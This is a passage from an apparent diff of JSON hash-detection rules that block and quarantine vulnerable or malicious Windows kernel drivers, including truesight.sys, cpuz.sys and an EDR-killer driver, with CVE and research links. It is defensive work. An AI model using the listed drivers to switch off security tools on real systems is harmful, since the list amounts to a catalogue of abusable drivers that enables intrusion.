"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817966Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "53f2bfe03b5d74c9db8c6a849e5a4690cba9a9861dd98c204865000506d8ce67", + "comment": "Vulnerable Kernel Driver (aka stdcdrvws64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1ba871cc-f886-537f-b30e-ec3fca2c090b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976764Z", + "creation_date": "2026-03-23T11:45:29.976767Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976772Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db0b5c434ddc7c97505a8be24431e9fbe484c2113df4ddf061aee91c35eab8b6", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bac03e4-bc3c-516b-af7f-bea3b49a2065", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824952Z", + "creation_date": "2026-03-23T11:45:30.824955Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824966Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dc22bbc782458f47244c9a2875b42f5916d87b4ca813eb20f1c88a2e444c36ac", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1baca231-cc28-54de-8e3a-daff1b35ac21", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615714Z", + "creation_date": "2026-03-23T11:45:29.615716Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615721Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "ce89124d29b5e562bbcc2f07b1dfac0f22dd66ad3deb32dd32c8c138a3739ef8", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bb75656-8ea6-5f19-8654-aae24887f9eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458898Z", + "creation_date": "2026-03-23T11:45:30.458902Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458910Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11b0e5d7971aaa2a6c4621f068af390f291fd796c202369605c2e0c7940f50ee", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bb8521e-2cd0-5496-8637-dfd4b0e2affb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, 
+ "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472723Z", + "creation_date": "2026-03-23T11:45:30.472726Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472735Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c8f0bb5d8836e21e7a22a406c69c01ba7d512a808c37c45088575d548ee25caa", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bb94e93-3293-568c-bd63-e2f0891ba078", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472317Z", + "creation_date": "2026-03-23T11:45:31.472321Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472330Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "960af5beee5b2f08932334d7387d7bf50bfb02885b12f2c5ade8edc83d5eca0a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bbbecd3-d5db-5980-9652-e817e527c9cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981489Z", + "creation_date": "2026-03-23T11:45:29.981491Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981496Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c640930c29ea3610a3a5cebee573235ec70267ed223b79b9fa45a80081e686a4", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bbd4c1d-6ff1-5a05-ab0a-d2451ca0977a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487755Z", + "creation_date": "2026-03-23T11:45:31.487757Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487763Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "67483af4d2a341aa05f09ddaff08d42ae8206a08707bc27cddab41622a5d8fd5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bbd845a-45de-598a-9baa-bf43f2320a53", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614058Z", + "creation_date": "2026-03-23T11:45:29.614060Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614066Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "525d9b51a80ca0cd4c5889a96f857e73f3a80da1ffbae59851e0f51bdfb0b6cd", + "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bc09a8b-1523-5450-8f66-b1f802d62c16", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831476Z", + "creation_date": "2026-03-23T11:45:30.831479Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831484Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fc288b9b40e3d0dbc5fa3df046e4ce61f1bd75086bb28233081c9cb6138d9103", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bc360f3-955e-5043-bc18-2e995fb89da2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817070Z", + "creation_date": "2026-03-23T11:45:30.817072Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817077Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a1105548bfc4b0a1b7b891cde0356d39b6633975cbcd0f2e2d8e31b3646d2ca", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bc4e500-1aa6-56ce-b677-5852a3efc0a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145307Z", + "creation_date": "2026-03-23T11:45:31.145309Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145315Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c0d52f1953a3edf62f454c7bdcfa714f53a04e475e4b08696763e2948edf82fb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bcb951e-d64b-53e0-ba14-242cb738eac4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154622Z", + "creation_date": "2026-03-23T11:45:31.154623Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154629Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5e625e5a2b33bb6051990b275e7a2381bc6cb8606504bfde5eb6dee08b24b6f6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bcbd8cb-d97d-52a0-95df-63d11648176f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833174Z", + "creation_date": "2026-03-23T11:45:30.833178Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833186Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17b055841b41b0c1bc4348ff8a35f95c9e9e69015dfb479f757f20173cb49123", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bdc5030-e696-5a15-8a22-c757fb258c60", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969151Z", + "creation_date": "2026-03-23T11:45:29.969153Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2732050a7d836ae0bdc5c0aea4cdf8ce205618c3e7f613b8139c176e86476d0c", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bf6e305-8e43-57b6-80a4-c242b5ba4881", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:29.616521Z", + "creation_date": "2026-03-23T11:45:29.616525Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616533Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "38d87b51f4b69ba2dae1477684a1415f1a3b578eee5e1126673b1beaefee9a20", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1bfad0c2-7782-57f0-a8d7-947e6025d272", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815419Z", + "creation_date": "2026-03-23T11:45:31.815421Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815426Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cff54479f814186be34225d85bc0a8106f6db9e0a250c3d8743c3d683a3bc695", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c0c52b3-548b-5b83-b692-846bf02e1202", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150889Z", + "creation_date": "2026-03-23T11:45:31.150891Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150896Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e553ee6a6caa39a96105a89518f69a891ff42defa190784376205b0ff824050", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c0f20d4-8602-59a4-8b7f-c440733e7405", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976318Z", + "creation_date": "2026-03-23T11:45:29.976320Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976326Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9bb09752cf3a464455422909edef518ac18fe63cf5e1e8d9d6c2e68db62e0c87", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c158798-8f32-530b-8842-5c2aede4c5f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979256Z", + "creation_date": "2026-03-23T11:45:29.979258Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979263Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb57f3a7fe9e1f8e63332c563b0a319b26c944be839eabc03e9a3277756ba612", + "comment": "Vulnerable Kernel Driver (aka d2.sys) [https://www.loldrivers.io/drivers/d05a0a6c-c037-4647-99ac-c41593190223/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c1f9c60-0057-5b73-933d-11a4f4631f2e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816474Z", + "creation_date": "2026-03-23T11:45:31.816477Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816485Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1308161256400a94d7314c6adbba7de8b5fe0002e60a8504f5382cc2fa366658", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c35c763-de95-5287-8880-61f7f69c9f0d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458750Z", + "creation_date": "2026-03-23T11:45:30.458753Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458762Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "52c7b29023ac2a98b7a9c73de790d820d3d6d095bea0b077d4dad53fa97b0731", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c36de56-0340-57a6-b3fe-061786879770", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980532Z", + "creation_date": "2026-03-23T11:45:29.980534Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980540Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7070ee6dd615538ca6a701e7bdc2c23a19b84ae8ca5f9edc6307fef47eb05abb", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c453ef8-654d-59af-aacc-b7ea0e17c893", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + 
}, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471742Z", + "creation_date": "2026-03-23T11:45:30.471745Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471754Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eaa5dae373553024d7294105e4e07d996f3a8bd47c770cdf8df79bf57619a8cd", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1c4c0c0a-abc8-55ee-9121-0c85a70395f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 